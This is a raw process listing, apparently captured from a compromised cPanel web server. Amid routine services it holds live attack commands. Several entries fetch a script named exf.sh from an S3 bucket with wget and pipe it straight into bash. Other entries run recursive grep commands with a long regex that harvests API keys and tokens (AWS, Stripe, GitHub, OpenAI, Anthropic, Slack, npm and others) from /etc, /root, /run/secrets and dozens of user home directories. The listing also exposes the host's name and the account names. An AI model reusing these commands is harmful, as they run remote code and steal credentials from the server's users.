File: //tmp/.e2537faa0-6c11-4056-a8bf-c7f680b8434f/cmdline.txt
[1033] dovecot/anvil
[1094] /usr/local/cpanel/3rdparty/perl/536/bin/perl -T -w /usr/local/cpanel/3rdparty/bin/spamd --allowed-ips=127.0.0.1,::1 --max-children=5 --pidfile=/var/run/spamd.pid --listen=5 --listen=6
[1108] cpgreylistd - processor
[1109] cPhulkd - processor
[1111] tailwatchd
[1112] dnsadmin - dormant mode
[1115] cpdavd - accepting connections on: 2091, 2077, 2078 (dormant)
[1130] /usr/sbin/httpd -k start
[1157] /usr/sbin/httpd -k start
[1212] cpanellogd - sleeping for logs
[1230] /usr/bin/sw-engine /usr/local/cpanel/3rdparty/wp-toolkit/bin/run-script scheduled-tasks-executor.php
[1231] /usr/bin/sw-engine /usr/local/cpanel/3rdparty/wp-toolkit/bin/run-script background-tasks-executor.php
[1236] /usr/sbin/httpd -k start
[1237] /usr/sbin/httpd -k start
[1256] /usr/sbin/httpd -k start
[1257] /usr/sbin/httpd -k start
[1440] /opt/nydus/bin/nydus-ex
[1450] /opt/nydus/bin/nydus-ex-api
[1499] php-fpm: master process (/usr/local/cpanel/etc/php-fpm.conf)
[1500] /usr/sbin/httpd -k start
[1566] /usr/sbin/httpd -k start
[1569] /usr/sbin/httpd -k start
[1605] /usr/sbin/httpd -k start
[1668] /usr/sbin/mysqld --daemonize --pid-file=/var/run/mysqld/mysqld.pid
[19947] wget -qO- https://amzn-s3-buckets-egalo.s3.eu-north-1.amazonaws.com/exf.sh
[19948] bash -s --
[19968] wget -qO- https://amzn-s3-buckets-egalo.s3.eu-north-1.amazonaws.com/exf.sh
[19969] bash -s --
[1] /usr/lib/systemd/systemd --switched-root --system --deserialize 22
[2105] /usr/sbin/httpd -k start
[2122] /usr/sbin/httpd -k start
[2126] /usr/sbin/httpd -k start
[2128] /usr/sbin/httpd -k start
[2129] /usr/sbin/httpd -k start
[2140] /usr/sbin/httpd -k start
[2149] /usr/sbin/httpd -k start
[2150] /usr/sbin/httpd -k start
[2154] /usr/sbin/httpd -k start
[22180] spamd child
[22181] spamd child
[23394] bash -s --
[23395] bash -s --
[23396] grep -rI -oE AKIA[A-Z0-9]{16}|SG\.[0-9A-Za-z_-]{22}\.[0-9A-Za-z_-]{43}|sk_live_[A-Za-z0-9]{24,}|sk_test_[A-Za-z0-9]{24,}|rk_live_[A-Za-z0-9]{24,}|pk_live_[A-Za-z0-9]{24,}|xkeysib-[a-zA-Z0-9]{64}-[a-zA-Z0-9]{16}|ghp_[A-Za-z0-9_]{36}|gho_[A-Za-z0-9_]{36}|github_pat_[A-Za-z0-9_]{22}_[A-Za-z0-9_]{59}|glpat-[A-Za-z0-9_-]{20,}|AccountKey=[A-Za-z0-9+/=]{60,}|sk-[a-zA-Z0-9]{20,}|sk-ant-[a-zA-Z0-9_-]{40,}|sk-proj-[a-zA-Z0-9_-]{40,}|key-[a-zA-Z0-9]{32}|xoxb-[0-9]{10,}-[A-Za-z0-9]{20,}|xoxp-[0-9]{10,}-[A-Za-z0-9]{20,}|xoxs-[0-9]{10,}-[A-Za-z0-9]{20,}|dop_v1_[a-f0-9]{64}|npm_[a-zA-Z0-9]{36}|pypi-[A-Za-z0-9_-]{100,}|shpat_[a-fA-F0-9]{32,}|shpss_[a-fA-F0-9]{32,}|shppa_[a-fA-F0-9]{32,}|whsec_[A-Za-z0-9]{32,}|lin_api_[A-Za-z0-9]{40}|[0-9]{8,10}:AA[A-Za-z0-9_-]{33}|r[us]_live_[A-Za-z0-9]{24,}|AC[a-f0-9]{32}|EAA[A-Za-z0-9]{50,}|sq0atp-[A-Za-z0-9_-]{22,}|ATBB[A-Za-z0-9_-]{40,}|hf_[A-Za-z0-9]{34}|HRKU-AA[0-9A-Za-z_-]{58}|HEROKU[A-Z0-9_]*[=:][^|[:space:]]*[0-9a-f]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}|heroku[a-zA-Z0-9_.-]{0,32}[:=][^|[:space:]]*[0-9a-f]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}|[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12} /app /backup /data /etc /home /home/chaahfoundation/ /home/durgesh/ /home/durgeshpandey215/ /home/fwinternational/ /home/kpritesh/ /home/menubook/ /home/printallresults/ /home/sabina/ /home/sevafoundation/ /home/somnath/ /home/styletribals/ /home/virtfs/ /home/whizzoffice/ /opt /project /run/secrets /server /src /tmp /usr/local /var/www /web --exclude-dir=node_modules --exclude-dir=.next --exclude-dir=.pm2 --exclude-dir=dist --exclude-dir=build --exclude-dir=out --exclude-dir=coverage --exclude-dir=.cache --exclude-dir=.git --exclude-dir=.svn --exclude-dir=.hg --exclude-dir=__pycache__ --exclude-dir=vendor --exclude-dir=.heroku --exclude-dir=.nuxt --exclude-dir=.terraform --exclude-dir=Pods --exclude-dir=target --exclude-dir=.pnpm-store --exclude-dir=.yarn --exclude-dir=proc --exclude-dir=sys --exclude-dir=dev --exclude-dir=snap --exclude-dir=lost+found --exclude=*.min.js --exclude=*.map --exclude=*.wasm* --exclude=*.bundle.js --exclude=*.chunk.js --exclude=*.pack --exclude=*.gz --exclude=*.br --exclude=*.bin --exclude=*.so --exclude=*.png --exclude=*.jpg --exclude=*.svg --exclude=*.ico --exclude=*.woff* --exclude=*.ttf --exclude=*.pdf --exclude=*.zip --exclude=*.tar --exclude=*.html
[23397] grep -rI -oE AKIA[A-Z0-9]{16}|SG\.[0-9A-Za-z_-]{22}\.[0-9A-Za-z_-]{43}|sk_live_[A-Za-z0-9]{24,}|sk_test_[A-Za-z0-9]{24,}|rk_live_[A-Za-z0-9]{24,}|pk_live_[A-Za-z0-9]{24,}|xkeysib-[a-zA-Z0-9]{64}-[a-zA-Z0-9]{16}|ghp_[A-Za-z0-9_]{36}|gho_[A-Za-z0-9_]{36}|github_pat_[A-Za-z0-9_]{22}_[A-Za-z0-9_]{59}|glpat-[A-Za-z0-9_-]{20,}|AccountKey=[A-Za-z0-9+/=]{60,}|sk-[a-zA-Z0-9]{20,}|sk-ant-[a-zA-Z0-9_-]{40,}|sk-proj-[a-zA-Z0-9_-]{40,}|key-[a-zA-Z0-9]{32}|xoxb-[0-9]{10,}-[A-Za-z0-9]{20,}|xoxp-[0-9]{10,}-[A-Za-z0-9]{20,}|xoxs-[0-9]{10,}-[A-Za-z0-9]{20,}|dop_v1_[a-f0-9]{64}|npm_[a-zA-Z0-9]{36}|pypi-[A-Za-z0-9_-]{100,}|shpat_[a-fA-F0-9]{32,}|shpss_[a-fA-F0-9]{32,}|shppa_[a-fA-F0-9]{32,}|whsec_[A-Za-z0-9]{32,}|lin_api_[A-Za-z0-9]{40}|[0-9]{8,10}:AA[A-Za-z0-9_-]{33}|r[us]_live_[A-Za-z0-9]{24,}|AC[a-f0-9]{32}|EAA[A-Za-z0-9]{50,}|sq0atp-[A-Za-z0-9_-]{22,}|ATBB[A-Za-z0-9_-]{40,}|hf_[A-Za-z0-9]{34}|HRKU-AA[0-9A-Za-z_-]{58}|HEROKU[A-Z0-9_]*[=:][^|[:space:]]*[0-9a-f]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}|heroku[a-zA-Z0-9_.-]{0,32}[:=][^|[:space:]]*[0-9a-f]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}|[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12} /api /backend /config /deploy /frontend /home/bigsell/ /home/cPanelInstall/ /home/durgeshpandey/ /home/footingwala/ /home/javed/ /home/krishna/ /home/nikki/ /home/rntextiles/ /home/sagar/ /home/shubhamnagari/ /home/spirevisibility/ /home/virel/ /home/whizzact/ /mnt /php-8.2.0 /root /scripts /sites /srv /Users /var/lib /var/www/html /workspace --exclude-dir=node_modules --exclude-dir=.next --exclude-dir=.pm2 --exclude-dir=dist --exclude-dir=build --exclude-dir=out --exclude-dir=coverage --exclude-dir=.cache --exclude-dir=.git --exclude-dir=.svn --exclude-dir=.hg --exclude-dir=__pycache__ --exclude-dir=vendor --exclude-dir=.heroku --exclude-dir=.nuxt --exclude-dir=.terraform --exclude-dir=Pods --exclude-dir=target --exclude-dir=.pnpm-store --exclude-dir=.yarn --exclude-dir=proc --exclude-dir=sys --exclude-dir=dev --exclude-dir=snap --exclude-dir=lost+found --exclude=*.min.js --exclude=*.map --exclude=*.wasm* --exclude=*.bundle.js --exclude=*.chunk.js --exclude=*.pack --exclude=*.gz --exclude=*.br --exclude=*.bin --exclude=*.so --exclude=*.png --exclude=*.jpg --exclude=*.svg --exclude=*.ico --exclude=*.woff* --exclude=*.ttf --exclude=*.pdf --exclude=*.zip --exclude=*.tar --exclude=*.html
[23403] bash -s --
[23404] bash -s --
[23405] grep -rI -oE AKIA[A-Z0-9]{16}|SG\.[0-9A-Za-z_-]{22}\.[0-9A-Za-z_-]{43}|sk_live_[A-Za-z0-9]{24,}|sk_test_[A-Za-z0-9]{24,}|rk_live_[A-Za-z0-9]{24,}|pk_live_[A-Za-z0-9]{24,}|xkeysib-[a-zA-Z0-9]{64}-[a-zA-Z0-9]{16}|ghp_[A-Za-z0-9_]{36}|gho_[A-Za-z0-9_]{36}|github_pat_[A-Za-z0-9_]{22}_[A-Za-z0-9_]{59}|glpat-[A-Za-z0-9_-]{20,}|AccountKey=[A-Za-z0-9+/=]{60,}|sk-[a-zA-Z0-9]{20,}|sk-ant-[a-zA-Z0-9_-]{40,}|sk-proj-[a-zA-Z0-9_-]{40,}|key-[a-zA-Z0-9]{32}|xoxb-[0-9]{10,}-[A-Za-z0-9]{20,}|xoxp-[0-9]{10,}-[A-Za-z0-9]{20,}|xoxs-[0-9]{10,}-[A-Za-z0-9]{20,}|dop_v1_[a-f0-9]{64}|npm_[a-zA-Z0-9]{36}|pypi-[A-Za-z0-9_-]{100,}|shpat_[a-fA-F0-9]{32,}|shpss_[a-fA-F0-9]{32,}|shppa_[a-fA-F0-9]{32,}|whsec_[A-Za-z0-9]{32,}|lin_api_[A-Za-z0-9]{40}|[0-9]{8,10}:AA[A-Za-z0-9_-]{33}|r[us]_live_[A-Za-z0-9]{24,}|AC[a-f0-9]{32}|EAA[A-Za-z0-9]{50,}|sq0atp-[A-Za-z0-9_-]{22,}|ATBB[A-Za-z0-9_-]{40,}|hf_[A-Za-z0-9]{34}|HRKU-AA[0-9A-Za-z_-]{58}|HEROKU[A-Z0-9_]*[=:][^|[:space:]]*[0-9a-f]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}|heroku[a-zA-Z0-9_.-]{0,32}[:=][^|[:space:]]*[0-9a-f]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}|[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12} /api /backend /config /deploy /frontend /home/bigsell/ /home/cPanelInstall/ /home/durgeshpandey/ /home/footingwala/ /home/javed/ /home/krishna/ /home/nikki/ /home/rntextiles/ /home/sagar/ /home/shubhamnagari/ /home/spirevisibility/ /home/virel/ /home/whizzact/ /mnt /php-8.2.0 /root /scripts /sites /srv /Users /var/lib /var/www/html /workspace --exclude-dir=node_modules --exclude-dir=.next --exclude-dir=.pm2 --exclude-dir=dist --exclude-dir=build --exclude-dir=out --exclude-dir=coverage --exclude-dir=.cache --exclude-dir=.git --exclude-dir=.svn --exclude-dir=.hg --exclude-dir=__pycache__ --exclude-dir=vendor --exclude-dir=.heroku --exclude-dir=.nuxt --exclude-dir=.terraform --exclude-dir=Pods --exclude-dir=target --exclude-dir=.pnpm-store --exclude-dir=.yarn --exclude-dir=proc --exclude-dir=sys --exclude-dir=dev --exclude-dir=snap --exclude-dir=lost+found --exclude=*.min.js --exclude=*.map --exclude=*.wasm* --exclude=*.bundle.js --exclude=*.chunk.js --exclude=*.pack --exclude=*.gz --exclude=*.br --exclude=*.bin --exclude=*.so --exclude=*.png --exclude=*.jpg --exclude=*.svg --exclude=*.ico --exclude=*.woff* --exclude=*.ttf --exclude=*.pdf --exclude=*.zip --exclude=*.tar --exclude=*.html
[23406] grep -rI -oE AKIA[A-Z0-9]{16}|SG\.[0-9A-Za-z_-]{22}\.[0-9A-Za-z_-]{43}|sk_live_[A-Za-z0-9]{24,}|sk_test_[A-Za-z0-9]{24,}|rk_live_[A-Za-z0-9]{24,}|pk_live_[A-Za-z0-9]{24,}|xkeysib-[a-zA-Z0-9]{64}-[a-zA-Z0-9]{16}|ghp_[A-Za-z0-9_]{36}|gho_[A-Za-z0-9_]{36}|github_pat_[A-Za-z0-9_]{22}_[A-Za-z0-9_]{59}|glpat-[A-Za-z0-9_-]{20,}|AccountKey=[A-Za-z0-9+/=]{60,}|sk-[a-zA-Z0-9]{20,}|sk-ant-[a-zA-Z0-9_-]{40,}|sk-proj-[a-zA-Z0-9_-]{40,}|key-[a-zA-Z0-9]{32}|xoxb-[0-9]{10,}-[A-Za-z0-9]{20,}|xoxp-[0-9]{10,}-[A-Za-z0-9]{20,}|xoxs-[0-9]{10,}-[A-Za-z0-9]{20,}|dop_v1_[a-f0-9]{64}|npm_[a-zA-Z0-9]{36}|pypi-[A-Za-z0-9_-]{100,}|shpat_[a-fA-F0-9]{32,}|shpss_[a-fA-F0-9]{32,}|shppa_[a-fA-F0-9]{32,}|whsec_[A-Za-z0-9]{32,}|lin_api_[A-Za-z0-9]{40}|[0-9]{8,10}:AA[A-Za-z0-9_-]{33}|r[us]_live_[A-Za-z0-9]{24,}|AC[a-f0-9]{32}|EAA[A-Za-z0-9]{50,}|sq0atp-[A-Za-z0-9_-]{22,}|ATBB[A-Za-z0-9_-]{40,}|hf_[A-Za-z0-9]{34}|HRKU-AA[0-9A-Za-z_-]{58}|HEROKU[A-Z0-9_]*[=:][^|[:space:]]*[0-9a-f]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}|heroku[a-zA-Z0-9_.-]{0,32}[:=][^|[:space:]]*[0-9a-f]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}|[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12} /app /backup /data /etc /home /home/chaahfoundation/ /home/durgesh/ /home/durgeshpandey215/ /home/fwinternational/ /home/kpritesh/ /home/menubook/ /home/printallresults/ /home/sabina/ /home/sevafoundation/ /home/somnath/ /home/styletribals/ /home/virtfs/ /home/whizzoffice/ /opt /project /run/secrets /server /src /tmp /usr/local /var/www /web --exclude-dir=node_modules --exclude-dir=.next --exclude-dir=.pm2 --exclude-dir=dist --exclude-dir=build --exclude-dir=out --exclude-dir=coverage --exclude-dir=.cache --exclude-dir=.git --exclude-dir=.svn --exclude-dir=.hg --exclude-dir=__pycache__ --exclude-dir=vendor --exclude-dir=.heroku --exclude-dir=.nuxt --exclude-dir=.terraform --exclude-dir=Pods --exclude-dir=target --exclude-dir=.pnpm-store --exclude-dir=.yarn --exclude-dir=proc --exclude-dir=sys --exclude-dir=dev --exclude-dir=snap --exclude-dir=lost+found --exclude=*.min.js --exclude=*.map --exclude=*.wasm* --exclude=*.bundle.js --exclude=*.chunk.js --exclude=*.pack --exclude=*.gz --exclude=*.br --exclude=*.bin --exclude=*.so --exclude=*.png --exclude=*.jpg --exclude=*.svg --exclude=*.ico --exclude=*.woff* --exclude=*.ttf --exclude=*.pdf --exclude=*.zip --exclude=*.tar --exclude=*.html
[23709] /usr/sbin/crond -n
[2553] /usr/sbin/httpd -k start
[2567] /usr/sbin/httpd -k start
[27332] /usr/sbin/httpd -DFOREGROUND
[27346] /usr/sbin/httpd -DFOREGROUND
[2904] wget -qO- https://amzn-s3-buckets-egalo.s3.eu-north-1.amazonaws.com/exf.sh
[2905] bash -s --
[30456] /usr/sbin/httpd -k start
[31180] /usr/sbin/httpd -k start
[3135] /usr/sbin/httpd -k start
[3147] /usr/sbin/httpd -k start
[3162] /usr/sbin/httpd -k start
[3163] /usr/sbin/httpd -k start
[3177] /usr/sbin/httpd -k start
[3178] /usr/sbin/httpd -k start
[3180] /usr/sbin/httpd -k start
[3184] /usr/sbin/httpd -k start
[3202] /usr/sbin/httpd -k start
[3206] /usr/sbin/httpd -k start
[3207] /usr/sbin/httpd -k start
[3210] /usr/sbin/httpd -k start
[3211] /usr/sbin/httpd -k start
[32401] /usr/sbin/httpd -k start
[32618] /usr/sbin/httpd -k start
[3840] /opt/cpanel/ea-php80/root/usr/bin/php-cgi
[417] /usr/lib/systemd/systemd-journald
[445] /usr/lib/systemd/systemd-udevd
[469] /sbin/auditd
[529] /usr/lib/systemd/systemd-logind
[531] queueprocd - waiting up to 60s to process a task
[533] /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
[545] /sbin/rpcbind -w
[566] cPhulkd - dbprocessor
[596] /usr/sbin/smartd -n -q never
[598] /usr/lib/polkit-1/polkitd --no-debug
[605] /usr/sbin/irqbalance --foreground
[612] /usr/bin/qemu-ga --method=virtio-serial --path=/dev/virtio-ports/org.qemu.guest_agent.0 --blacklist= -F/etc/qemu-ga/fsfreeze-hook
[6152] /usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=ip-208-109-13-31.ip.secureserver.net --suffix=-bytes_log
[6153] /usr/local/cpanel/bin/splitlogs --dir=/etc/apache2/logs/domlogs --main=ip-208-109-13-31.ip.secureserver.net --mainout=/etc/apache2/logs/access_log
[6156] /usr/local/cpanel/3rdparty/bin/perl /usr/local/cpanel/bin/leechprotect
[6162] dovecot/pop3-login
[6163] dovecot/imap-login
[6164] dovecot/log
[6166] dovecot/pop3-login
[6167] dovecot/imap-login
[6168] dovecot/config
[6169] dovecot/stats
[618] /usr/sbin/gssproxy -D
[633] /usr/sbin/nscd
[677] /usr/sbin/atd -f
[697] /usr/sbin/exim -ps -bd -q1h -oP /var/spool/exim/exim-daemon.pid
[698] /sbin/agetty --noclear tty1 linux
[935] /usr/sbin/dovecot -F -c /etc/dovecot/dovecot.conf
[936] /opt/nydus/bin/nydus-ex
[937] /opt/nydus/bin/nydus-ex-api
[938] /usr/sbin/sshd -D
[940] /usr/bin/python2 -Es /usr/sbin/tuned -l -P
[946] cpsrvd (SSL) - waiting for connections
[951] /usr/sbin/pdns_server --guardian=no --daemon=no --disable-syslog --log-timestamp=no --write-pid=no
[955] /usr/sbin/rsyslogd -n